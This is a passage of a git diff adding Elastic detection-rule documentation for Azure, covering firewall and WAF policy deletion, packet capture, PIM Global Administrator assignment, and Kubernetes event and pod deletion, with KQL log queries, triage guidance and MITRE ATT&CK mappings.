+ +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/firewall-manager/policy-overview + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Network Security Monitoring +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Firewall Policy Deletion* + + +Azure Firewall policies are crucial for managing and enforcing network security rules across Azure environments. Adversaries may target these policies to disable security measures, facilitating unauthorized access or data exfiltration. The detection rule monitors Azure activity logs for successful deletion operations of firewall policies, signaling potential defense evasion attempts by identifying specific operation names and outcomes. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by filtering for the operation name "MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE" and ensuring the event outcome is "Success". +- Identify the user or service principal responsible for the deletion by examining the 'caller' field in the activity logs. +- Check the timestamp of the deletion event to determine when the policy was deleted and correlate it with other security events or alerts around the same time. 
+- Investigate the context of the deletion by reviewing any related activities performed by the same user or service principal, such as modifications to other security settings or unusual login patterns. +- Assess the impact of the deletion by identifying which resources or networks were protected by the deleted firewall policy and evaluating the potential exposure or risk introduced by its removal. +- Contact the responsible user or team to verify if the deletion was authorized and part of a planned change or if it was unexpected and potentially malicious. + + +*False positive analysis* + + +- Routine maintenance or updates by authorized personnel can trigger the deletion event. Ensure that such activities are logged and verified by cross-referencing with change management records. +- Automated scripts or tools used for infrastructure management might delete and recreate firewall policies as part of their operation. Identify these scripts and exclude their activity from alerts by using specific identifiers or tags. +- Test environments often undergo frequent changes, including policy deletions. Consider excluding activity from known test environments by filtering based on resource group or subscription IDs. +- Scheduled policy updates or rotations might involve temporary deletions. Document these schedules and adjust monitoring rules to account for these expected changes. +- Ensure that any third-party integrations or services with permissions to modify firewall policies are accounted for, and their actions are reviewed and whitelisted if necessary. + + +*Response and remediation* + + +- Immediately isolate the affected Azure resources to prevent further unauthorized access or data exfiltration. This can be done by applying restrictive network security group (NSG) rules or using Azure Security Center to quarantine resources. +- Review Azure activity logs to identify the user or service principal responsible for the deletion. Verify if the action was authorized and investigate any suspicious accounts or credentials. +- Restore the deleted firewall policy from backups or recreate it using predefined templates to ensure that network security rules are reinstated promptly. +- Implement conditional access policies to enforce multi-factor authentication (MFA) for all users with permissions to modify or delete firewall policies, reducing the risk of unauthorized changes. +- Escalate the incident to the security operations team for further investigation and to determine if additional resources or systems have been compromised. +- Conduct a post-incident review to identify gaps in security controls and update incident response plans to address similar threats in the future. +- Enhance monitoring by configuring alerts for any future attempts to delete or modify critical security policies, ensuring rapid detection and response to potential threats. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
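+
+For broader coverage during a hunt, the query below combines this rule's operation with the Front Door WAF policy deletion operation used by a companion rule in this package, so both kinds of network-policy removal appear in a single search. It is illustrative only; scope it before use.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:("MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE" or "MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE") and event.outcome:(Success or success)
+----------------------------------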
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc new file mode 100644 index 0000000000..4d10cb9322 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-frontdoor-web-application-firewall-waf-policy-deleted.asciidoc @@ -0,0 +1,119 @@ +[[prebuilt-rule-8-19-8-azure-frontdoor-web-application-firewall-waf-policy-deleted]] +=== Azure Frontdoor Web Application Firewall (WAF) Policy Deleted + +Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in Azure. An adversary may delete a Frontdoor Web Application Firewall (WAF) Policy in an attempt to evade defenses and/or to eliminate barriers to their objective. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#networking + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Network Security Monitoring +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Frontdoor Web Application Firewall (WAF) Policy Deleted* + + +Azure Frontdoor WAF policies are crucial for protecting web applications by filtering and monitoring HTTP requests to block malicious traffic. Adversaries may delete these policies to bypass security measures, facilitating unauthorized access or data exfiltration. The detection rule identifies such deletions by monitoring Azure activity logs for specific delete operations, signaling potential defense evasion attempts. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by filtering for the operation name "MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE" and ensure the event outcome is marked as Success. 
+- Identify the user or service principal responsible for the deletion by examining the associated user identity information in the activity logs. +- Check the timestamp of the deletion event to determine if it coincides with any other suspicious activities or alerts in the environment. +- Investigate the context of the deletion by reviewing any recent changes or incidents involving the affected Azure Frontdoor instance or related resources. +- Assess the impact of the deletion by identifying which web applications were protected by the deleted WAF policy and evaluating their current exposure to threats. +- Review access logs and network traffic for the affected web applications to detect any unusual or unauthorized access attempts following the policy deletion. + + +*False positive analysis* + + +- Routine maintenance or updates by authorized personnel may lead to the deletion of WAF policies. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks. +- Automated scripts or tools used for infrastructure management might delete and recreate WAF policies as part of their normal operation. Identify these scripts and exclude their activity from triggering alerts. +- Changes in organizational policy or architecture could necessitate the removal of certain WAF policies. Document these changes and adjust the detection rule to account for them by excluding specific policy names or identifiers. +- Test environments may frequently add and remove WAF policies as part of development cycles. Consider excluding activity from test environments by filtering based on resource group names or tags associated with non-production environments. + + +*Response and remediation* + + +- Immediately isolate the affected Azure Frontdoor instance to prevent further unauthorized access or data exfiltration. +- Review Azure activity logs to identify the user or service principal responsible for the deletion and assess their access permissions. +- Recreate the deleted WAF policy using the latest backup or configuration template to restore security controls. +- Implement conditional access policies to restrict access to Azure management operations, ensuring only authorized personnel can modify WAF policies. +- Notify the security operations team and relevant stakeholders about the incident for further investigation and monitoring. +- Conduct a post-incident review to identify gaps in security controls and update incident response plans accordingly. +- Enhance monitoring by setting up alerts for any future deletions of critical security policies to ensure rapid detection and response. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
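+
+Deletion is not the only way to weaken a WAF policy; modifying it can achieve a similar effect. Azure resource providers typically expose a corresponding WRITE operation, so a hunt such as the query below may surface policy changes as well. The WRITE operation name is an assumption based on that naming pattern and is not taken from this rule, so verify it against your own activity logs before using it.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/WRITE" and event.outcome:(Success or success)
+----------------------------------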
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Cloud Firewall +** ID: T1562.007 +** Reference URL: https://attack.mitre.org/techniques/T1562/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-full-network-packet-capture-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-full-network-packet-capture-detected.asciidoc new file mode 100644 index 0000000000..038f9d6e51 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-full-network-packet-capture-detected.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-azure-full-network-packet-capture-detected]] +=== Azure Full Network Packet Capture Detected + +Identifies potential full network packet capture in Azure. Packet Capture is an Azure Network Watcher feature that can be used to inspect network traffic. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 107 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Full Network Packet Capture Detected* + + +Azure's Packet Capture is a feature of Network Watcher that allows for the inspection of network traffic, useful for diagnosing network issues. However, if misused, it can capture sensitive data from unencrypted traffic, posing a security risk. Adversaries might exploit this to access credentials or other sensitive information. The detection rule identifies suspicious packet capture activities by monitoring specific Azure activity logs for successful operations, helping to flag potential misuse. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific user or service principal associated with the packet capture operation by examining the `azure.activitylogs.operation_name` and `event.dataset` fields. 
+- Check the timestamp of the detected packet capture activity to determine the exact time frame of the event and correlate it with any other suspicious activities or changes in the environment. +- Investigate the source and destination IP addresses involved in the packet capture to understand the scope and potential impact, focusing on any unencrypted traffic that might have been captured. +- Verify the legitimacy of the packet capture request by contacting the user or team responsible for the operation to confirm if it was authorized and necessary for troubleshooting or other legitimate purposes. +- Assess the risk of exposed sensitive data by identifying any critical systems or services that were part of the captured network traffic, especially those handling credentials or personal information. + + +*False positive analysis* + + +- Routine network diagnostics by authorized personnel can trigger the rule. To manage this, create exceptions for specific user accounts or IP addresses known to perform regular diagnostics. +- Automated network monitoring tools might initiate packet captures as part of their normal operations. Identify these tools and exclude their activities from triggering alerts. +- Scheduled maintenance activities often involve packet captures for performance analysis. Document these schedules and configure the rule to ignore captures during these periods. +- Development and testing environments may frequently use packet capture for debugging purposes. Exclude these environments by filtering based on resource tags or environment identifiers. +- Legitimate security audits may involve packet capture to assess network security. Coordinate with the audit team to whitelist their activities during the audit period. + + +*Response and remediation* + + +- Immediately isolate the affected network segment to prevent further unauthorized packet capture and potential data exfiltration. +- Revoke any suspicious or unauthorized access to Azure Network Watcher and related resources to prevent further misuse. +- Conduct a thorough review of the captured network traffic logs to identify any sensitive data exposure and assess the potential impact. +- Reset credentials and access tokens for any accounts or services that may have been compromised due to exposed unencrypted traffic. +- Implement network encryption protocols to protect sensitive data in transit and reduce the risk of future packet capture exploitation. +- Escalate the incident to the security operations team for further investigation and to determine if additional security measures are necessary. +- Enhance monitoring and alerting for Azure Network Watcher activities to detect and respond to similar threats more effectively in the future. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
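+
+For a quick data check or a wider hunt, a wildcard match on the operation name can be simpler than enumerating the patterns in the rule query, at the cost of more noise. This query is a hunting aid, not part of the rule.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:*PACKETCAPTURE* and event.outcome:(Success or success)
+----------------------------------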
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name: + ( + MICROSOFT.NETWORK/*/STARTPACKETCAPTURE/ACTION or + MICROSOFT.NETWORK/*/VPNCONNECTIONS/STARTPACKETCAPTURE/ACTION or + MICROSOFT.NETWORK/*/PACKETCAPTURES/WRITE + ) and +event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Network Sniffing +** ID: T1040 +** Reference URL: https://attack.mitre.org/techniques/T1040/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-global-administrator-role-addition-to-pim-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-global-administrator-role-addition-to-pim-user.asciidoc new file mode 100644 index 0000000000..7532c093df --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-global-administrator-role-addition-to-pim-user.asciidoc @@ -0,0 +1,124 @@ +[[prebuilt-rule-8-19-8-azure-global-administrator-role-addition-to-pim-user]] +=== Azure Global Administrator Role Addition to PIM User + +Identifies an Azure Active Directory (AD) Global Administrator role addition to a Privileged Identity Management (PIM) user account. PIM is a service that enables you to manage, control, and monitor access to important resources in an organization. Users who are assigned to the Global administrator role can read and modify any administrative setting in your Azure AD organization. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Global Administrator Role Addition to PIM User* + + +Azure AD's Global Administrator role grants extensive access, allowing users to modify any administrative setting. Privileged Identity Management (PIM) helps manage and monitor such access. Adversaries may exploit this by adding themselves or others to this role, gaining persistent control. The detection rule identifies suspicious role additions by monitoring specific audit logs, focusing on successful role assignments to PIM users, thus helping to flag potential unauthorized access attempts. + + +*Possible investigation steps* + + +- Review the Azure audit logs to confirm the details of the role addition event, focusing on the event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement fields. 
+- Identify the user account that was added to the Global Administrator role by examining the azure.auditlogs.properties.target_resources.*.display_name field. +- Check the event.outcome field to ensure the role addition was successful and not a failed attempt. +- Investigate the user account's recent activities and login history to determine if there are any anomalies or signs of compromise. +- Verify if the role addition aligns with any recent administrative changes or requests within the organization to rule out legitimate actions. +- Assess the potential impact of the role addition by reviewing the permissions and access levels granted to the user. +- If suspicious activity is confirmed, initiate a response plan to remove unauthorized access and secure the affected accounts. + + +*False positive analysis* + + +- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role for maintenance or updates. To manage this, create exceptions for known IT personnel or scheduled maintenance windows. +- Automated scripts or tools used for role assignments can cause false positives if they frequently add users to the Global Administrator role. Consider excluding these automated processes from monitoring or adjusting the detection rule to account for their activity. +- Temporary project-based role assignments might be flagged as suspicious. Implement a process to document and pre-approve such assignments, allowing for their exclusion from alerts. +- Training or onboarding sessions where new administrators are temporarily granted elevated access can result in false positives. Establish a protocol to notify the monitoring team of these events in advance, so they can be excluded from the detection rule. + + +*Response and remediation* + + +- Immediately revoke the Global Administrator role from any unauthorized PIM user identified in the alert to prevent further unauthorized access. +- Conduct a thorough review of recent changes made by the affected account to identify any unauthorized modifications or suspicious activities. +- Reset the credentials of the compromised account and enforce multi-factor authentication (MFA) to secure the account against further unauthorized access. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Implement additional monitoring on the affected account and related systems to detect any further suspicious activities. +- Review and update access policies and role assignments in Azure AD to ensure that only necessary personnel have elevated privileges. +- Document the incident and response actions taken for future reference and to improve incident response procedures. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
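+
+When reviewing potential false positives such as routine administrative assignments, it can help to look at PIM role additions across all roles rather than only Global Administrator. The query below removes the role-name filter from the rule query; it is a baselining aid and will match far more activity than the rule.
+
+[source, js]
+----------------------------------
+event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and azure.auditlogs.operation_name:("Add eligible member to role in PIM completed (permanent)" or "Add member to role in PIM completed (timebound)") and event.outcome:(Success or success)
+----------------------------------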
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and + azure.auditlogs.operation_name:("Add eligible member to role in PIM completed (permanent)" or + "Add member to role in PIM completed (timebound)") and + azure.auditlogs.properties.target_resources.*.display_name:"Global Administrator" and + event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-events-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-events-deleted.asciidoc new file mode 100644 index 0000000000..78646b3be6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-events-deleted.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-19-8-azure-kubernetes-events-deleted]] +=== Azure Kubernetes Events Deleted + +Identifies when events are deleted in Azure Kubernetes. Kubernetes events are objects that log any state changes. Example events are a container creation, an image pull, or a pod scheduling on a node. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Log Auditing +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Kubernetes Events Deleted* + + +Azure Kubernetes Service (AKS) manages containerized applications using Kubernetes, which logs events like state changes. These logs are crucial for monitoring and troubleshooting. Adversaries may delete these logs to hide their tracks, impairing defenses. The detection rule identifies such deletions by monitoring specific Azure activity logs, flagging successful deletion operations to alert security teams of potential evasion tactics. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by checking for the operation name "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE" and ensure the event outcome is marked as "Success". 
+- Identify the user or service principal responsible for the deletion by examining the associated identity information in the activity logs. +- Investigate the timeline of events leading up to and following the deletion to identify any suspicious activities or patterns, such as unauthorized access attempts or configuration changes. +- Check for any other related alerts or anomalies in the Azure environment that might indicate a broader attack or compromise. +- Assess the impact of the deleted events by determining which Kubernetes resources or operations were affected and if any critical logs were lost. +- Review access controls and permissions for the user or service principal involved to ensure they align with the principle of least privilege and adjust if necessary. +- Consider implementing additional monitoring or alerting for similar deletion activities to enhance detection and response capabilities. + + +*False positive analysis* + + +- Routine maintenance activities by authorized personnel may trigger deletion events. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks. +- Automated scripts or tools used for log rotation or cleanup might delete events as part of their normal operation. Identify these scripts and exclude their activity from triggering alerts by whitelisting their associated service accounts or IP addresses. +- Misconfigured applications or services that inadvertently delete logs can cause false positives. Review application configurations and adjust them to prevent unnecessary deletions, and exclude these applications from alerts if they are verified as non-threatening. +- Test environments often generate log deletions during setup or teardown processes. Exclude these environments from monitoring or create specific rules that differentiate between production and test environments to avoid unnecessary alerts. + + +*Response and remediation* + + +- Immediately isolate the affected Azure Kubernetes cluster to prevent further unauthorized access or tampering with logs. +- Conduct a thorough review of recent activity logs and access permissions for the affected cluster to identify any unauthorized access or privilege escalation. +- Restore deleted Kubernetes events from backups or snapshots if available, to ensure continuity in monitoring and auditing. +- Implement stricter access controls and audit logging for Kubernetes event deletion operations to prevent unauthorized deletions in the future. +- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation. +- Escalate the incident to the incident response team if there is evidence of broader compromise or if the deletion is part of a larger attack campaign. +- Review and update incident response plans to incorporate lessons learned from this event, ensuring quicker detection and response to similar threats in the future. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
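+
+When checking for related anomalies, reviewing other Kubernetes deletion activity in the Azure activity logs alongside the event deletions can be useful, for example pod deletions by the same actor. The query below is an illustrative hunting pivot rather than part of the rule; the pod deletion operation name is taken from a related rule in this package, and the query should be adapted to your environment.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:
+  ("MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE" or
+  "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE") and
+event.outcome:(Success or success)
+
+----------------------------------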
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE" and +event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-pods-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-pods-deleted.asciidoc new file mode 100644 index 0000000000..4eb4c20746 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-pods-deleted.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-azure-kubernetes-pods-deleted]] +=== Azure Kubernetes Pods Deleted + +Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kubernetes pod to disrupt the normal behavior of the environment. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Asset Visibility +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Kubernetes Pods Deleted* + + +Azure Kubernetes Service (AKS) enables the deployment, management, and scaling of containerized applications using Kubernetes. Pods, the smallest deployable units in Kubernetes, can be targeted by adversaries to disrupt services or evade detection. Malicious actors might delete pods to cause downtime or hide their activities. The detection rule monitors Azure activity logs for successful pod deletion operations, alerting security teams to potential unauthorized actions that could impact the environment's stability and security. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the details of the pod deletion event, focusing on the operation name "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE" and ensuring the event outcome is marked as "Success". +- Identify the user or service principal responsible for the deletion by examining the associated identity information in the activity logs. +- Check the timeline of events leading up to the pod deletion to identify any unusual or unauthorized access patterns or activities. 
+- Investigate the specific Kubernetes cluster and namespace where the pod deletion occurred to assess the potential impact on services and applications. +- Cross-reference the deleted pod's details with recent changes or deployments in the environment to determine if the deletion was part of a legitimate maintenance or deployment activity. +- Consult with the relevant application or infrastructure teams to verify if the pod deletion was authorized and necessary, or if it indicates a potential security incident. + + +*False positive analysis* + + +- Routine maintenance or updates by authorized personnel can lead to legitimate pod deletions. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks. +- Automated scaling operations might delete pods as part of normal scaling activities. Identify and exclude these operations by correlating with scaling events or using tags that indicate automated processes. +- Development and testing environments often experience frequent pod deletions as part of normal operations. Consider excluding these environments from alerts by using environment-specific identifiers or tags. +- Scheduled job completions may result in pod deletions once tasks are finished. Implement rules to recognize and exclude these scheduled operations by matching them with known job schedules or identifiers. + + +*Response and remediation* + + +- Immediately isolate the affected Kubernetes cluster to prevent further unauthorized actions. This can be done by restricting network access or applying stricter security group rules temporarily. +- Review the Azure activity logs to identify the source of the deletion request, including the user or service principal involved, and verify if the action was authorized. +- Recreate the deleted pods using the latest known good configuration to restore services and minimize downtime. +- Conduct a thorough security assessment of the affected cluster to identify any additional unauthorized changes or indicators of compromise. +- Implement stricter access controls and role-based access management to ensure only authorized personnel can delete pods in the future. +- Escalate the incident to the security operations team for further investigation and to determine if additional clusters or resources are affected. +- Enhance monitoring and alerting for similar activities by integrating with a Security Information and Event Management (SIEM) system to detect and respond to unauthorized pod deletions promptly. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
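+
+Because failed deletion attempts can precede a successful one, it may also be worth hunting for unsuccessful pod deletion operations around the alert time. The query below is an illustrative variant of the rule logic with the outcome filter inverted; it is not part of the rule and should be validated in your environment.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE" and
+not event.outcome:(Success or success)
+
+----------------------------------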
